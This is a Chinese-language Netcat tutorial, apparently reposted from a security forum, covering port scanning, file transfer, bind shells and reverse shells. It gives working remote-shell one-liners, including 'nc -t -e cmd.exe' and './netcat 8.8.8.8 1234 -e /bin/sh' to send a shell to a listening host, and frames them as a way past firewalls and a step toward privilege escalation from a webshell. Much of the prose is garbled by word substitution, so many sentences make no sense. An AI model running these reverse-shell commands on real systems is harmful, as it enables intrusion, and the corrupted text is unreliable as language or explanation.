|
|
|
联系客服020-83701501

科普:Netcat使用手册

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
科普:Netcat应用手册

简介:

在Internet东西中有“瑞士军刀”佳誉的NetCat(如下简称nc),在我们用了N年了至今仍是爱不释手。因为它短小精悍(这个用在它身上很失当,此刻有人已经将其批改成大要10K支配,并且遵从不增多)。

参数花色

连贯到某处:

nc [-options] hostname port[s] [ports] …

监听端口守候连贯:

nc -l -p port [-options] [hostname] [port]

主要参数:

Default
123456789101112131415161718192021222324252627282930313233343536373839 options: -d              无号令行界面,应用布景模式 -e prog          法式重定向 [戕害!!] -g gateway       源路由腾跃点, 不超越8 -G num          源路由批示器: 4, 8, 12, ... -h              获取募捐消息 -i secs           延时设置,端口扫描时应用 -l               监听入站消息 -L              监听晓得NetCat被结束(可断开重连) -n              以数字模式默示的IP地址 -o file           使进制记载 -p port          掀开外地端口 -r               随机外地和长途的端口 -s addr          外地源地址 -t               以TELNET的模式应答入站乞请 -u              UDP 模式 -v               示意具体消息 [应用=vv获取更具体的消息] -w secs          连贯超时设置 -z               I/O 模式 [扫描时应用] 端口号或者是单个的或者存在一个范畴: m-n [包含值]。

主要用途

突出我们应用netcat做的最多的事故为如下三种:

1、? 扫描指定IP端口情况

2、? 端口转发数据(重点)

3、提交自定义数据包

1、扫描少用号令。

如下IP 处或者应用域名,nc会挪用NDS分析成IP地址。

【号令】nc -v ip port

【比方】nc -v 96.44.174.9 80

【解释】扫瞄某 IP 的某个端口,前去端口消息具体输出。

【号令】nc -v -z ip port-port

【比方】nc -v -z 96.44.174.9 80-1024

【解释】扫描某IP的端口段,前去端口消息具体输出,但扫描速率很慢。

【号令】nc -v -z -u ip? port-port

【比方】nc -v -z -u 96.44.174.9 25-1024

【解释】扫描某 IP 的某 UDP 端口段,前去端口消息具体输出,但扫描速率很慢。

【号令】nc -nvv -w2 -z ip port-port

【比方】nc -nvv -w2 -z 96.44.174.9 80-1024

【解释】扫锚某IP的端口段,连贯超屡屡间为2秒。

实例:

01

总结:应用nc扫描速率真的不敢谄媚,并且关于扫描主机存活、端口等还是交给更业余的nmap来遏制,物尽其用才是硬事理,这里全当科普。

2、监听端口、连贯端口、转发端口少用号令。

【号令】nc -l -p 520

【解释】开启本机的 TCP 520 端口并监听次端口的上传输的数据。

【号令】nc -l -v -p 520

【解释】开启本机的 TCP 520 端口并将监听到的消息输出到以后 CMD 窗口。这个号令也是端口转发shell的基础底细。

【号令】nc -l -p 520 > C:/log.dat

【解释】开启本机的 TCP 520 端口并将监听到的消息输出到 C:/log.dat 下的日志文件里。

【号令】nc -nvv 192.168.1.101 520

【解释】连贯到192.168.1.101主机的 520。

重点一(正向连贯):

【长途运行】nc -l -p 2012 -t -e C:WINDOWSsystem32cmd.exe

【外地运行】nc -nvv 192.168.1.101 2012

【解释】采纳正向连贯举措,长途主机(注:如果IP地址为 192.168.1.101)上运行 nc -l -p 2012 -t -e cmd.exe 意为绑定长途主机的 CMD 到2012 端口,当外地主机连贯长途主机腐败时就会前去给外地主机一个CMD Shell ;在外地主机上运行 nc -nvv 192.168.1.101 2012 用于连贯已经将 CMD 重定向到 2012 端口的长途主机(注:如果IP地址为 192.168.1.101)。

重点二(反向连贯):

【外地运行】nc -l –vv -p 2012

【长途运行】nc -t -e C:WINDOWSsystem32cmd.exe 192.168.1.102 2012

【解释】采纳反向连贯举措,先在外地主机(拥有公网IP)运行 nc -l –vv -p 2012 开启2012 端口并监听守候长途主机连贯;在长途主机上运行 nc -t -e cmd.exe 192.168.1.102 2012 将长途主机的 CMD 重定向到 IP 地址为 192.168.1.102 端口号为2012 的主机上,连贯腐败后 IP 地址为 192.168.1.102 的主时机失去一个CMD Shell。

02

总结:这个情况是起码用的内网端口转发遵从,何等反弹shell便可实验号令。反向连贯便是少用的反弹shell到外地,因为由主机积极发送的情况外地防火墙等装备突出不会去拦挡,而正向连贯到长途主机的某端口每每被拦挡。

实例:

(上面一个cmd是公网IP主机,下图为笔者外地主机,或者通过目录看到shell可实验号令)

4、提交数据、文件传输少用号令

【号令】nc -vv www.91ri.org port < C:/http.txt

【比方】nc -vv www.91ri.org 80 < C:/http.txt

【解释】提交http.txt内数据包到www.91ri.org的80端口,-vv参数会使速率变慢,但或者跟踪过程。比方IISput缝隙便或者自定义数据包应用此体式花色提交。

【号令1】nc -v -n ip port < C:/sunzn.exe

【号令2】nc -v -l -p port > D:/sunzn.exe

【解释】在外地运行 nc -v -n ip port < C:/sunzn.exe 意为从外地 C 盘根目录中读取 sunzn.exe 文件的形式,并把这些数据发送到长途主机的对应端口上(注:号令行中的 IP 为接管文件的长途主机 IP ),在长途主机运行 nc -v -l -p port > D:/sunzn.exe 意为监听对应端口并把接管到的消息数据写到 D:/sunzn.exe 中,两行号令实现了文件在外地主机和长途主机间的传输。

传输http数据包实例:

03

Linux情况下netcat应用

法宝必然需要在差别的情况中都能应用,在linux情况中同样有着netcat或者应用。主要过程以下。

Linux提权绝大全副都靠的是Local Exploit。WebShell突出都或者实验号令,可是溢出必需在可交互情况运行,不然假如直接在WebShell实验,即使能溢出提权腐败,也无法应用。因此必需要反弹一个Shell号令行窗口,在号令行终端下实验溢出遏制提权。

主要步伐:

1、wget一个tar缩短的nc

Default
1 Wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz

2、解压文件

Default
1 tar zxvf netcat-0.7.1.tar.gz

3、解压结束以后会生成目录

Default
1 cd netcat-0.7.1

4、配置情况

Default
1 ./configure

5、配置完了以后便或者编译了。

Default
1 Make

6、编译腐败就生成了netcat可实验的文件了,位于src目录,cd进去进背运行./netcat文件便是我们的nc了。

长途Linux转发号令

Default
1 ./netcat 8.8.8.8 1234 -e /bin/sh

日币褒扬:

本文为原创科普型文章,首发91ri.org,作者具体的将netcat的常见号令列出并配以实例,失当老手阅读,依照本站积分规则给以日币褒扬共6枚。

数安新闻+更多

证书相关+更多